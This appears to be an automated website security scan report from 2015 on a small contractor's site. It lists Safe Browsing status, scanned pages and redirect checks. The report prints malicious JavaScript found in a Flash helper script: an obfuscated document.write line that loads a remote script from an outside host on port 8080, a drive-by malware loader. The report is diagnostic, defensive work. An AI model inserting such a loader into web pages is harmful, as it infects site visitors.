Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cmbcontractor.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://cmbcontractor.com/ | 200 OK Content-Length: 16649 Content-Type: text/html | clean |
http://cmbcontractor.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8158 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<sc'+'ript type="text/javascript" src="http://addle.diretctrishta.com:8080/Virtual_Memory.js"></scri'+'pt>'); Antivirus reports:
| ||
http://cmbcontractor.com/index.html | 200 OK Content-Length: 16649 Content-Type: text/html | clean |
http://cmbcontractor.com/about-us.html | 200 OK Content-Length: 18073 Content-Type: text/html | clean |
http://cmbcontractor.com/latest-project.html | 200 OK Content-Length: 16905 Content-Type: text/html | clean |
http://cmbcontractor.com/adition.html | 200 OK Content-Length: 21298 Content-Type: text/html | clean |
http://cmbcontractor.com/renovation.html | 200 OK Content-Length: 19916 Content-Type: text/html | clean |
http://cmbcontractor.com/contact-us.html | 200 OK Content-Length: 23086 Content-Type: text/html | clean |
http://cmbcontractor.com/new-construstion.html | 200 OK Content-Length: 17088 Content-Type: text/html | clean |
http://cmbcontractor.com/framing.html | 200 OK Content-Length: 22114 Content-Type: text/html | clean |
http://cmbcontractor.com/plumbing.html | 200 OK Content-Length: 19571 Content-Type: text/html | clean |
http://cmbcontractor.com/electrical.html | 200 OK Content-Length: 19881 Content-Type: text/html | clean |
http://cmbcontractor.com/insulation.html | 200 OK Content-Length: 18826 Content-Type: text/html | clean |
http://cmbcontractor.com/painting.html | 200 OK Content-Length: 20216 Content-Type: text/html | clean |
http://cmbcontractor.com/garage-package.html | 200 OK Content-Length: 18484 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cmbcontractor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 18:02:13 GMT
Accept-Ranges: bytes
ETag: "40c1577-4109-512e1aa4"
Server: Apache
Content-Length: 16649
Content-Type: text/html
Last-Modified: Wed, 27 Feb 2013 14:39:32 GMT
...16649 bytes of data.
GET / HTTP/1.1
Host: cmbcontractor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 18:02:13 GMT
Accept-Ranges: bytes
ETag: "40c1577-4109-512e1aa4"
Server: Apache
Content-Length: 16649
Content-Type: text/html
Last-Modified: Wed, 27 Feb 2013 14:39:32 GMT
...16649 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cmbcontractor.com
Referer: http://www.google.com/search?q=cmbcontractor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cmbcontractor.com
Referer: http://www.google.com/search?q=cmbcontractor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.